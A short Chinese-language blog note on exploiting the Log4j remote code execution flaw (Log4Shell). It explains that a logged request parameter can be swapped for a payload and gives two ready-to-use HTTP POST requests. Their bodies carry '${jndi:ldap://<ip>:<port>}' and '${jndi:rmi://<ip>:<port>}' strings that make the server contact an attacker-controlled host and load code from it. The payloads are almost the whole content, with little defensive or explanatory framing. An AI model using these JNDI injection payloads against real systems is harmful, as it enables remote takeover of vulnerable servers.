【笔记】Log4j代码执行漏洞利用

发表于 更新于 阅读次数:

前言

Log4j由反序列化漏洞引起的代码执行漏洞利用

漏洞利用

  • 如果处理的方法中调用Log4j输出日志,且接收了请求参数作为变量,则可以修改请求参数为payload
request
1
2
3
4
POST http://127.0.0.1:80/
Content-Type: application/x-www-form-urlencoded

x="${jndi:ldap://<ip>:<port>}"
request
1
2
3
4
POST http://127.0.0.1:80/
Content-Type: application/x-www-form-urlencoded

x="${jndi:rmi://<ip>:<port>}"

漏洞利用组合

JNDI注入

完成